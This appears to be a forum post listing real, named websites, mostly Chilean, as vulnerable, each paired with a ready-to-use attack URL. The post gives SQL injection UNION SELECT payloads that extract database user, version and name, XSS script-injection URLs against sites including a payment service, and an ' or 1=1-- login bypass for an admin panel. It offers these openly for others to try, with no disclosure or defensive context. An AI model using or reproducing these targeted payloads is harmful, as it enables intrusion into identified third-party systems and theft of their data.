andystefano

Vulnerable a SQL Inyeccion: http://www.aricasurf.cl/noti.php?id=457+and+1=-1+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9-- http://www.laligua.cl/noti01.php?id=37+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database())+--+ http://www.movistararena.cl/not.php?id=78+and+1=-1+UNION+SELECT+1,2,3,4,5,6,7-- http://www.iglesia.cl/valparaiso/admin/mostrar_news.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,version%28%29,12,13,14-- http://www.elfinanciero.cl/ver_detallecursos.php?recordID=367+and+1=0+union+select+all+1,2,3,concat_ws(0x3A,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15+--+ XSS: http://www.servipag.com/browse.asp?pagina=web/msgerror.htm&mensaje_error=%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E http://www.bathstudent.com/404/?url=%3Ch1%3E%3C/a%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E http://dl.nin.com/theslip/confirmation?token=B61LbT12%22%3E%3Cscript%3Ealert%28/xss/.source%29%3C/script%3E%3Cq%20a=%22 http://www.barragantv.net:80/videos.php?pag=1<ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt> http://www.bibliodrogas.cl/biblioteca/web/resultados2.php?pag=1&solo_digital=&Buscar_Por=03&Fin_Consulta=&sec_busqueda=382758&sec_canasto=0&accion=.&FILTRO=%28+DESCRIPTORES+like+%27%25\&Txt_Busqueda=%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E Bypass: http://www.novovision.cl/admin/ user ' or 1=1-- pass ' or 1=1-- Vean Mis otros post!! Mas adelante creare un post de seguridad!!!!